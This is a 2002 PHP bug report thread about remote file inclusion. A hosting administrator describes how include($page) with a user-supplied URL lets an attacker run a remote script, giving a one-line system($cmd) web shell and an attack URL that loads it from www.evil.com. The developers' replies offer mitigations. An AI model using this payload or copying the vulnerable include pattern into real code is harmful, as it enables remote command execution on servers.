ID: 15187 Comment by: rsemmens at names dot co dot uk Reported By: tozz at kijkt dot tv Status: Bogus Bug Type: Scripting Engine problem Operating System: Linux 2.4 PHP Version: 4.1.1 New Comment:
I know this is rather an old issue, but I've found a new problem with it. Several correspondents report correctly that it's a user error... However it isn't always possible to verify user code. I look after a lot of shared hosting, and I've come across this: User writes a template type page, which part way through says something like: <? if ($page) include ($page) else echo "Default text"; ?> Intending obviously to specify something like sales.html as $page. However if a remote person writes a text file that says something like: <? system($cmd); ?> And puts it on a remote server _not_ under our control you get this problem. Using the first example, evil person executes: http://embrace/index.php?page=http://www.evil.com/cmd.txt&cmd=ls Now this, as you can tell, executes locally. The only way around that I can tell is by enabling safe mode, but that is not exactly ideal... It would mean disabling almost everything for all our users. Any ideas? Or is there a way of disabling remote includes? Richard. Previous Comments: ------------------------------------------------------------------------ [2002-01-23 15:52:48] [EMAIL PROTECTED] speaking of phpnuke... this security problem in phpnuke was reported a while back to its developers. if they havent fixed it by now blame them. ------------------------------------------------------------------------ [2002-01-23 15:49:50] [EMAIL PROTECTED] We can't stop developers from shooting themselves in the foot. If you want to include a remote file without parsing it locally, you would use: readfile("http://domain.com/filename";); You could of course also just use the allow_url_fopen directive in your php.ini file if you really want to turn this off. If you removed all the functions that developers could use to shoot themselves in the foot with there wouldn't be much left to do interesting things. ------------------------------------------------------------------------ [2002-01-23 15:42:16] tozz at kijkt dot tv It's true dat this is a 'user error', however there are scripts (e.g. phpnuke has this problem) that allows a user to enter the URL that will be included. So, your right if a script is secure you wont deal with this bug.. but I still see it as a security issue ------------------------------------------------------------------------ [2002-01-23 15:37:30] [EMAIL PROTECTED] This is bad programming. If you want to avoid this, you should NOT use include() for stuff on other servers, but fopen() or similar instead (which doesn't parse the data). BTW: the 'bug' in issue.php can be avoided by proper use of register_globals, safe-mode and/or normal (unix) file permissions. ------------------------------------------------------------------------ [2002-01-23 15:36:30] [EMAIL PROTECTED] RTFM! Include is for including PHP scripts into your PHP script. If you only want to include parsed output then do not use include. ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/15187 -- Edit this bug report at http://bugs.php.net/?id=15187&edit=1
